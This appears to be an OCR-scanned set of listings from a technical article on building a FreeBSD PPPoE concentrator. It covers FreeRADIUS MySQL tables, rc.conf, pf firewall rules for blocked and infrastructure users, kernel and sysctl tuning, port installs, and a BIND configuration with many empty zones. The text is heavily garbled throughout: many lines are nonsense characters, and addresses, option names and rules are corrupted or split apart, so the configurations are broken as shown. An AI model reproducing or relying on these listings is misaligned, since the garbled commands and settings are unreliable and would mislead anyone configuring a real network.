eae I) TeSlUsEs | Framed-IPv6-Prefix | == | 2001:db8:cafe:cafe::/64 | 

+------- +------------- $-------------------- +----+------------------------- + 


4 rows in set (0.00 sec) 


Listing 13. 


mysql> select * from radgroupcheck where trim(groupname) =’ TEST-50MB’ ; 


+----- $--------------------- $------------------ +----+------- + 
| id | GroupName | Attribute | op | Value | 
+----- $--------------------- $------------------ +----+------- + 
| 249 | LE Si=S0hB | Simultaneous-Use | := | 1 | 
+----- $--------------------- $------------------ +----+------- + 


1 row in set (0.00 sec) 


mysql> select * from radgroupreply where trim(groupname) =’ TEST-50MB’ ; 


+----- +--------------------- +-------------------- +----4------------------------------------------------ + 
| id | GroupName | Attribute | op | Value | 
+----- +--------------------- +-------------------- +----4------------------------------------------------ + 
[4272 1 thor =50MB | Framed-Protocol | := | PPP | 
| 473° | TEST=50MB | Service-Type | := | Framed-User | 
| 474 | TEST=50MB | Framed-Compression | := | Van-Jacobsen-TCP-IP | 
| 475 |) TeST-50MB | mpd-limit | += | ian#l=all rate-limit 51000000 9562500 19125000 | 
| 476 | Test=50MB [erro che Ttrnine | += | out#l=all rate-limit 51000000 9562500 19125000 | 
+----- +--------------------- +-------------------- +----4------------------------------------------------ + 


5 rows in set (0.00 sec) 
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Listing 14. 


mysql> select * from usergroup where username=’ testuser’ ; 


+------------- +----------- +---------- + 
| UserName | GroupName | priority | 
+------------- +----------- +---------- + 
| TESTUSER | TEST-50MB | cle 
+------------- +----------- +---------- + 


1 row in set (0.00 sec) 


Listing 15. 
mysql> select * from radippool limit 3; 
+----+----------- $----------------- +-------------- +----------------- $------------------ +------------- +---------- +---------- + 


[Puc |Spoolmwencs |Mrcameccdtpeddress || astpadduess | |ical ledcrcrionia  ipecallingstarnonid ||exp ery eine ll Useriamen||poolkey | 


+----+----------- $----------------- $-------------- $----------------- $------------------ $------------- +------------ +---------- + 
eo ietaimacooles | S27 User Iisa | | |} NULL | NULL | | 0 | 
[SOS emainepool | 20s. Oe Niaed | | | NULL | NULL | | 0 | 
| Li | Mmatnepool | 19270226 | | | NULL | NULL | | 0 | 
+----+----------- $----------------- $-------------- $----------------- $------------------ $------------- +------------ +---------- 4 


3 rows in set (0.00 sec) 


Listing 16. 
the logfile 


+ Cat /ete/ re cont 


hestnane="valhallas connection lost combi” mpd enable="YES” 
ECON E Lge 4— anette Sn is neds e200 medetlags= =D —s mpd. 
LECOMMg  EgGb4 al uasO="tnels IG. ol. h00 2 mermask 

Lome OOO. Named semable=" Vhs” 


EE COMIG UGOS= Acie ye es0l2 os MelMesike Zoo 02 son on 0 
jee VOUschole more e Ena one NNCRrer  eie MED Nten tate, postfix enable="YES” 


Enemy OUNneecm rome limb ti ewe sendmail enable=”NO” 
FLLCOMNG 1gGb2=" up” sendmail submit enable="NO” 
#ifconiig igbl="up” sendmail outbound enable="NO” 
flTCOnng 1C00=" tp” sendmail msp queue enable="NO” 


daily velean hoststat enable= NO” 
detaultuouter= Ze 0. ie.) Gat ye stabs Mat a seycetssenaole— Ne ™ 
gateway enable="YES” daily status include submit marltgq= NO” 
daily submit _queuerun="NO” 
LOMOmACE hice weiner maces —" aims. 
Up VOncde Tatllinnowwen— «7 0 0NE volo = ale Esck \y enable="YES” 
LECOnNG  goUlieve= Inere 200M dbo. ss Pret len 32” 
1pv6 gateway enable="YES” SyVetlogdeilags— Seon mons Le 


pf enable="YES” nginx enable="YES” 
pf rules="/etc/pf.conf” 


pf flags=”” feGiwbap enable="Vhs” 
pt device=”"/dev/pft” fcgiwrap user="www” 
pilog enable="YES” # start pflogd(8) fcgiwrap socket="unix: /var/run/fcgiwrap/fcgiwrap.sock” 
pilog flags=”"” # additional flags for 
pilogd=starrup Send renaole= Vhs” 


pilog logfile="/var/log/pflog” # where pflogd should store 
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dumpdev="AUTO” 


CoUs ehiinnyeenaolio= Vine 


ntpd_enable="YES” 


bsnmpd_enable="YES” 


quagga_ enable="YES” 
quagga_ flags=”-d” 








quagga daemons="zebra ospfd ospf6d” 

watchquagga_ enable="YES” 

watchquagga flags=”-dz -R ‘/usr/local/etc/rc.d/quagga 
restart’ zebra ospfd ospf6d” 


log_i0 enable="YES” 


#eof 


Listing 17. 

PECONMCUgl t= thet Aue aU eles Oo MetMaa -2 50.2 On oo 0 
SoC ie =exCoull aux eounl 

riecontig tgb4 aliasl= aneu I9e.5l 7100.5 netmask 
oe Ore orue 

EECOMMGRLG Ds = ncn lI 72 eon Nb Mask "209n2 0054) Ins © 
Siro, =Cxe sui, Sire sum, 


fLECONNG UG 2— Mp =tsO. -11O —“hwesum sexesum” 


Listing 18. 

edit /etc/pf.conf: 

ext _ 1f="igb4” 

ext ip="203.0.113.5” 
exec = 200 Case 5” 
Sxe Loead— i eo Ons 


Ie eee— 190s" 

Ee hp — 20. So 

int net=”192.0.2.0/24” 

Iie On Oedicask—= 290-0 Jiao 120” 


set limit states 10000000 

set limit table-entries 1000000 
set limit src-nodes 1000000 

see Finite rags. LOOCO00 


set skip on 1o0 
set skip on lol 


set loginterface igb0 


Se mule nee al 


# tables LO LUM the Stark Scripts from mod5 

table <PRIVADOS> persist 

table <PUBLICOS> persist 

table <PUBLICOS6> persist 

table <BLOQUEADOS> persist 

table <BLOQUEADOS6> persist 

# table to release access to private ips to the net- 
WOLk, EyoLcally used co SsuppOrE 

eeblle=<GOD> | 20370 sls 7 Go} 

# table used to create a specific user for infrastructure 
and/or support, without internet access, just access 
to the lan or address released in IPSINFRA table 
(only create a PPPoE user that receives the address 
of the table INFRA) 

table <INFRA> { 203.0.113.70 } 

table <IPSINFRA> { 192.0.2.0/24 } 

# table used for addresses that blocked customer may 
have access to, usually ip PPPoE concentrator and 
your web server to create a block page and access for 
future payment 

maiilos NONBROCK> {257 0, Ole 205 20eel 3.57203. 0F Mise; 

Gaile <NONBIOCKG> = { =) 200M cbs 4 

# table with routers and PPPok concentrators 

walle <ROULERS> (202 02s. 20570 ie. 5} 

Eales <ROULERSo> {9 200M does 200 dbs ss, } 

# table Of monitoring servers, usually a zabbix for 
checking and cacti for collect servers snmp data 

table <MONITORAMENTO> {203.0.113.10} 

table <MONITORAMENTO6> { 2001:db8::10 } 

# table of who is authorized to consult their recursive dns 

table: <DNS> (127-020. iy 208.02 11s 20/ 247 03. Sie N00. 0/2479 
22020724) 

table <DNGe>s 43 2804264053732) 

# table with the ips of Radius servers 

vabile  <RADIUS> {ier ol N00} 

# table release to the support system 

table <SUPORTE> (203.0 .113.69} 

# table of local ips in the PPPoE concentrator 

pallor <hOChiL > 2057 Uells Sys oe 0 0r Syl Ua 7 25) 

table <LOCAWo> f 2001 dbs 2s } 

# table release to the support system and mpd5 Web interface 

table <SYSADMIN> {203.0.113.69} 

table <SYSADMIN6> {2804:c40::cafe} 

# table from internal connected ips 


table <CONNECIED> =( 31332 ol lr, Io 2. 0S a 


Mae OlleceXUaete trom “ER ADOS> roel y —7 tooxX sip 
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Nees OMmoiieeln trom <COD> iO. oir eicm > so iieiD 


no rdr proto tcp from <BLOQUEADOS> to <NONBLOCK> 


rdr pass proto tcp from <BLOQUEADOS> to !<NONBLOCK> port 
COR Oe Oe 

rdr proto tcp from <BLOQUEADOS6> to !<NONBLOCK6> port 80 
=P el 

rdr pass proto tcp from <BLOQUEADOS> to !<NONBLOCK> port 
AAS => 12/202 05 1 pore 380 

rdr proto tcp from <BLOQUEADOS6> to !<NONBLOCK6> port 
ALS => sl poe 80 


blocks In logucgiicketromeciy touoilemotoddedst 

block quick log from <BLOQUEADOS> to !<NONBLOCK> 

block quick log inet6 from <BLOQUEADOS6> to !<NONBLOCK6> 

pass guick log proto {tcp,udp} from <BLOQUEADOS> to 
<ROUTERS> port 53 

pass guick log inet6 proto {tcp,udp} from <BLOQUEADOS 6> 
Or ROUTER SO> Pore 5s 

block in quick log from <PRIVADOS> to <PRIVADOS> 

block in quick log from <PUBLICOS> to <PRIVADOS> 

block an cqurck log from <PUBLICOSO> ro <PRIVADOS> 

block in quick log from <INFRA> to !<IPSINFRA> 

bloc quick Wog@ororo {rco, ude) from '<ROULERS> toOvany 
pore {199 ,2001 2604, 2606} 

block “Guick Inero preto {fep, udp} from !'<kOUTERSG> tro 
ally peut 199 oul Z O04 Zo 0ioy 

block quick log proto {tcp,udp} from !<MONITORAMENTO> to 
any port {161} 

block quick inet6 proto {tcp,udp} from !<MONITORAMENTO6> 
E@many pee «{ Gi} 

block quick leg proto {reo ude} from !<DNS> to <LOCAL> 
(Cress 

block quick log inets proto {tcp,udp) Erom !<DNSG> co 
<LOCAL6> port 53 


block quick log from <PRIVADOS> to <CONNECTED> 
block quick log from <PUBLICOS> to <CONNECTED> 


PIO Cheque logon ob heh obo tuce, Ge) s from. 
SINADINUISE? 1) Serie Gs) ieerel jsouee 57 2 

lollovel< @fbakiel< iNere) ein SSsic aki jeieonee) 4 ieee) ice) seeteiy GSN 
ADMIN> to <LOCAL> port 5006 

Och Guileks le¢ tone ctr eeaproroutEce ud) @irom. Vacors— 
ADMIN> to <LOCAL> port {80,666} 

DO Che GUC OG won ext EE OEOLOu ECD, Udy) strom. | 
<SUPORTE> to <LOCAL> port {80,666} 

blOcki Gulch eG Von -ox<reEr WNC e pirolo. | eCe ude}  £Lom 


1<SYSADMIN6> to Sext ipo port {80,666} 
lollerei< eibake< Wei; ein eric ile Linley) joerc) [ices Ulole}; az ej 
I<SYSADMING> LO Sexe ipo porte S006 


pass all 


#eof 


Listing 19. 

# vi /root/kernels/valhalla 
# netgraph options 

options HZ=4000 

options NETGRAPH 

options NETGRAPH PPPOE 
options NETGRAPH SOCKET 
options Nat CRAPHVeLS€o 
options NETGRAPH ECHO 
options NETGRAPH FRAME RELAY 
options NETGRAPH HOLE 
options NETGRAPH KSOCKET 
options NETGRAPH LMI 
options NETGRAPH RFC1490 
Options NETCRARH ITY 

Ole Loja! EINE TL INS INC 
options NETGRAPH BPE 
options NETGRAPH ETHER 
Sprwons NE TCRARA EBACE 
operons NEVGRARE 2 he 
options NETGRAPH MPPC ENCRYPTION 
Opciones NETCKARE OE EE 
Cpbtons  NaTCRAPIOEP EPC 
Options NETGRAPH TEE 
options NETGRAPH UI 

options NETGRAPH VJC 
options NETGRAPH CAR 








options NETGRAPH NETFLOW 


options ALTQ 
OC LONE AML! (Cie 
CpElons Alto MRED 
CpEwoOns pall OmRaO 
CpErons AlLlOURESe 
Cperoncn ia hOmrnadi® 








CpEtOns Allo UNOPree 


device pf 
device pflog 


device pfsync 
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OpEvons 1 PS TE ALI net.inet.ip.rtexpire=2 
net.inet.ip.rtminexpire=2 
Opiteome ROUTETABLES=3 
net.inet.tcp.syncookies=0 
options SC_NORM ATTR=(FG GREEN|BG BLACK) 
options SC_KERNEL CONS ATTR=(FG YELLOW|BG BLACK) dev.igb.0.fc=0 
dev.igb.1.fc=0 
OprLone SC HISTORY SIZE=8192 dev.igh.2.fc=0 
#eof dev.igb.3.fc=0 
dev.igb.4.fc=0 
# make builkernel KERNCONF=valhalla deve tdbi 5, £C=0 
# make installkernel KERNCONF=valhalla dev.igb.6.fc=0 
dev.igb.7.fc=0 
Listing 20. 
joey Ce sycct lcontr net.inet.ip.check interface=1 
kern.ipc.maxsockbuf=157286400 ete eto. Pp eCececcmOPrrons—0 
Nek. New, veo. sendbus max=157 256400 IAN eee Nese Mee Cla —() 
NEE TINGE, Eee recybuL Max—lo) 736400 Me Eee Gel Ons Becinteii= | 
I [te (ears Ne TN rele @ (ele Clana Gas il 
kern.ipc.nmbclusters=2097152 ete Ner eo qc EOOmsy. lili —t 
Net INch ECO racw eunWade a rece lo= i 
Net. IneL cep. ce. algorithm=neep ete Net eo heMomlcyvaest—C 
NEE INCE. ECeL CC. NeCpradadPE ye backon b= net.inet.tcp.msl=5000 
EN Tee Ie Oe - Ineo. ice see Neh erste Paki MEMEG is eOveny—( 
net.inet.udp.blackhole=1 
net.inet.ip.forwarding=1 net.inet.tcp.blackhole=2 
Met Inet. 1p. bastrorwarding—1 sieCtieley osc ees Gulisie vce 
net.inet.ip.portrange.first=1024 net.inet.tcp.ecn.enable=1 
net.inet.ip.portrange.hifirst=1024 net.inet.tcp.maxtcptw=15000 
net.inet.ip.portrange. last=65535 net.inet.icmp.icmplim=0 
kern.ipc.soacceptqueue=65535 net.inet.tcp.sendspace=262144 
Kern. Mpc; somaxconn=65535 net.inet.tcp.recvspace=262144 
net.inet.udp.recvspace=16772216 
net.inet.tcp.mssdflt=1460 net.inet.udp.maxdgram=57344 
net.inet.tcp.minmss=1300 
Net eENer. BeO ma nelle 75 — SE KALINGA ce On se iCllohe ike —3)/4 | (are 
NEI NCE ECO nbc ss) )=—i NEE INGE LED seeCvOUli TiC =G.0900 
net.inet.tcp.sack.enable=1 net.inet.tcp.hostcache.expire=3900 
net.inet.tcp.tso=0 er INeta wep .delavyeduack= | 
net.inet.tcp.delacktime=50 
net.inet.tcp.nolocaltimewait=1 
kern.sched.interact=30 
net.inet.tcp.syncache.rexmtlimit=0 kern.sched.slice=12 
net.inet.tcp.msl=5000 
net.local.stream.sendspace=164240 
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net.local.stream.recvspace=164240 net.inet.tcp.hostcache.bucketlimit="100” 
kere randeies js. laryesknerlerien—— coretemp load=”YES” 
keri ceandoiles ye ler yese I Mren npr EC IEPs loOad=" (Eo 


kKeGiabendomes slaves: pomp seOupOllE—U 


ker bandomesys.Narvest.scwi—U Lf 1gb 7 load="YES” 
kern.ipc.maxsockets=524288 loader logo= beastie” 
net.inet.raw.maxdgram=16384 net.link.ifqmaxlen="1024” 


net.inet.raw.recvspace=16384 


hw.igb.txd="4096” 


net.inet6.icmp6.nodeinfo=0 hw.igb.rxd="4096” 

Neto tieto. up6 Use tempaddr—i hwetgbe ex pEocess ime r= = 

Net. Ico. 10 preter itempaddr= hw.igb.enable aim="1” 

NEtsMcto. Teneo ceduudeceor—|) hw: igb.mMax Interrupt rate= "32000" 
Net INeho. Lon aceeprn rradv—U hw.igb.num_ queues="0” 
##net.inet6.ip6.auto linklocal=0 hw.igb.enable msix="1” 
kern.ipc.shmmax=2147483648 kern.ipc.nmbclusters="2097152” 
kern.ipc.shmall=2097152 kern.ipc.nmbufs="6434970” 


kern.ipc.nmbj]umbop="985356” 
kern.maxvnodes=100000000 

ini rite Oram selnGeoinomG—= 700) 
net.graph.maxdgram=16772216 


net.graph.recvspace=16772216 net.inet.tcp.tcbhashsize="65536” 
net.inet.tcp.blackhole=2 net.isr.bindthreads="0” 
net.inet.udp.blackhole=1 net.isr.defaultqlimit="4096” 
Nez INCE. tCo drops ynin—i net.isr.maxthreads=7 


net.inet.tcp.syncookies=1 
MEE eEN Cire Clee GOP me mechinne er—il kern.ipc.maxsockets=524288 


net .Inet. temp. log redirect—0 





net.inet.ip.redirect=0 #eof 
#eof 

# vi /boot/loader.conf 

kern.maxusers=1024 

net.graph.maxdata=65536 

net.graph.maxalloc=65536 

kern.ipc.maxpipekva=620000000 
net.inet.tcp.syncache.hashsize=1024 
net.inet.tcp.syncache.bucketlimit=512 


net.inet.tcp.syncache.cachelimit=65536 


net.inet.tcp.hostcache.hashsize="16384” 
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Install fegiwrap: 


# cd /usr/ports/www/fcgiwrap 


# make install clean 


Install quagga: 


# cd /usr/ports/net/quagga 


+ take install clean 


Install log.io: 


# cd /usr/ports/www/npm 


npm config 


He HEHE HEHE SHR 


make install clean 
ln -s /usr/local/bin/python2.7 /usr/local/bin/python 


In -s /usr/bin/clang++ /usr/bin/g++ 


set python /usr/local/bin/python2.7 


npm install -g node-gyp 


nom install =-g log.10 —=user *root’ 


Install sudo: 


# cd /usr/ports/security/sudo 


# make install clean 


Install radvd: 





Listing 21. 


tigi) See, resolv com 


nameserver 127.0.0.1 


¢# vi /usr/local/etc/namedb/named.cont 


OpeLons. { 





// All file and path names are relative to the chroot 


directory, 


// if any, and should be fully qualified. 


directory “/usr/local/etc/namedb/working”; 


P 


dump-file 


statistics-file 


id-file “/var/run/named/pid” ; 


“/var/dump/named dump.db”; 


MU Vad) sinais) MaMec ee teins, & 


allow-query { trusted; }; 


elon = mia aise Cig ae@r Melee, wa)r, 


JeSCeen=One fle sO. Ont 0s 0. lo. oe) 


lis ten=on=v 6 { 


disable-empty-zone 


disable-empty-zone 


sOtOs Onl Or On aOrs Os. 


disable-empty-zone 


OO Or OOO Ur On Ur On Ur Orn Ur On Ul E OPA 


Se ZOOM dee ee 


P25 0e Zon Zon Zon LN SADR ARPA; 
POO Oe Oa Worse a Orson Om Ur Om OrO a0 
O50 05070. Unt Po sARPAY; 

lee OanOen Orn lm Ce OUcn Ue nO mon O rane 





channe i eaniciin Loo, 
files Yer NOC) sScuriiny LOG: 
severity debug; 


print-time yes; 


te 


channe ie <item loge 
fer! aie MOG hetedlog. 
severity debug; 


print-time yes; 


Te 


CAbege ty 
Cabegory 
Cabegor, 
Calegory 
Cae ge by 
Cakege ty 
Cake go by, 
Ge TSCpole) 
Category 


He 


ee oun omnis a 





denciihen{meyoremlog: a). 

Secubiuy  (eclicitebogy sey stenlog. i}: 
config { systemlog; }; 

xfer-in { xfer log; }; 

xfer-out { xfer log; }; 

Owe eee WclintemeLOc), aut; 

update { audit log; }; 

queries { audit log; }; 


Tames servers | souchhua Og, a}. 








Zion ell aor 
}; 1 2 OO: 
ee 
Logging { acl trusted { 
channel systemlog { 2 0 ees 
file “/var/log/named.log”; 203202 Tise07 24% 
severity debug; O20 2a. 
print-time yes; ZUM sala se 27375 
bi }i 
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zone “.” { type hint; file “/usr/local/etc/namedb/named.root”; }; 


zone “localhost” { type master; file “/usr/local/etc/namedb/master/localhost-forward.db”; }; 
Zone 17 /<in-aderearoa { type master; file “/usr/local/etc/namedb/master/localhost-reverse.db”; }; 


ZOMee 255 sin adc va nca { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “O.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/localhost-reverse.db”; }; 


zone “O.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “~LUVin-addrarca” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


me a 


zone “16.172.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


ahs 


Zone: = i (eli aa elca mere pa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


ne af 


ZOWMEG® SoG loi. ia — aia Cie renee type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Wr Is aS ae 


Zone “lel Z 7a neaddm arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Wr 


Zone: “ZUR Zed cade ee aapa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


7 a= 


Zone. (21st 2 dan-addrear oa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Wr 


ZONE 227 sin cldeeecieid type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


LA aS alin 


Zone “2322 in -adan aoa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 











safes fs fees 


zone “2421 )2 in—-adar arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


as ee 


zone “25.172.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Zome= “261i 22i1n-add rear pa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


Zone: “Z)/2liZein—-addre arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


1 


Zone “28.172 .in-addr arpa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


zone “29.172.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 


a ee es 


Zone, “SUnIZ ta n—adar -arcoa type master; file “/usr/local/etc/namedb/master/empty.db”; }; 














safes 


type master; file “/usr/local/etc/namedb/master/empty.db”; }; 





















































x 
~S 
o_ a= a-£ oa oa J o-«~ oa a= a a -«~ = a= o_ 


Zone. Sie #220 addres area 


Ww 


zone “168.192.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 










































































zone “64.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “65.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “66.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “67.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “68.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “69.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “70.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “71.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “72.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “73.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “74.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “75.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “76.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “77.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “78.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “79.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “80.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “81.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “82.100.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
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in-addr. 


in-addr. 























mm me 3 A ES SO 


om mee 3 ES OSU ES OE eS 


ee 
Eyes 
Evee 
type 
yee 
type 
Eye 
iL ice 
Evoe 
Eves 
type 
Eyee 
eS 
ee 
ie 
Eves 
Evee 
Eyoe 
Evoe 
Eee 
Eye e 
type 
Eyoe 
Eve 
type 
Eyoe 
eee 
cee 
nee 
Eyoe 
Eyes 
Eype 
Eye 
ee 
Eyoe 
ie 
Eyoe 
Evie 
type 
yee 
ee 
vee 
Eyoe 
Eyoe 
Eyve 


Loe 


ee 


master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 
master; 


master; 


master; 


master; 


file 
file 
file 
file 
file 
file 
file 
file 
file 
file 
file 
file 
file 
file 
file 


file 





file 
fil 
fil 
fill 
aval 





fil 


fil 


S 


S 


Se 


Se 


Se 


Se 


“/usr/local/etc/name 
“/usr/local/etc/name 
“/usr/local/etc/name 
“/usr/local/etc/name 
“/usr/local/etc/name 


Wien lecely cre, mame 





“ise local) etey name 
Rice ocak eucy meme 


icc local) otc mame 


Py sa) local: 


“usr local) etc/name 
Py asi) Meccan ere, mame 


ici) hocaly ane, meme 


yey local. 


wi ice/ loea, 2c) fame 


“Vuiscy kocal, Srey mame 











“/usr/local/etc/namedb/ma 
Ost, hocaul 
“/usr/local/etc/nam 
“/usr/local/etc/nam 
“/uist/ loca l/euc/ nem 
“/uast/ local/etc/ mamedb/m 

“7ust/ local, etc; nam 

“/usr/ local/etc/ nam 

Us), local, ete; nam 

“/ ust) Local 

“/usr/local/etc/nam 

“/ust/ local/ercy nam 

“/usr/local/etc/namedb/m 

“usr local, etc, nam 

“/usr/local/etc/nam 
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zone “2.0.192.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “100.91 2198 n-addrtarpa’ { type master, mle “/usr/ local/ets/namedb/master/empty.db” >}; 
zone “11370; 203-in-addt arpa” { (ype master, ile /usr/local/ere/namedd/master/empiy-db 7 }, 
zone “8.b.d.0.1.0.0.2.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “test” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “example” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “invalid” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “example.com” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “example.net” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “example.org” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “18.198.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “19.198.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone. “240 ,in-addr ,atpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “241.in-addr.arpa” { MEVecmilcisicc ti agiikows /Wic~/eocaly cre, Mameds) Masta ~ cm yl) ant. 
zone “242.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “243.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “244.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
Zome “245. in-dddr. arpa { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “246.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
Zone. “24 ].in=addr wa tpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
Zone 202 in—addwsacpan { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
Zone » 240 sMeaddrearpa { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
Zone 250 ein sacclieracoa { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “251.in-addr.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
OMe. “752. in cadierc tan { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
Zone “253, in-addr, arpa { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
ZOMe. W754 iN aOdmvatoa { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “l.ip6é.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “3.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “4.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “5.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “6.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “7.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “8.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “9.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “a.ip6é.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “b.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “c.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “d.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “e.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “0.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “1.f.ip6é.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 

zone “2.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
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zone “3.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “4.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “5.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “6.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “7.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
Zone “S,isipo.arpa” { type master; tle “/usr/ local/etc/namedb/master/empty.db”; }> 
zone “9.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “a.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “b.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “Q.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “l.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “2.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “3.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “4.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “5.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “6.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “7.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “c.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 














zone “d.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
































zone “8.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “9.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “a.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
zone “b.e.f.ip6.arpa” { type master; file “/usr/local/etc/namedb/master/empty.db”; }; 
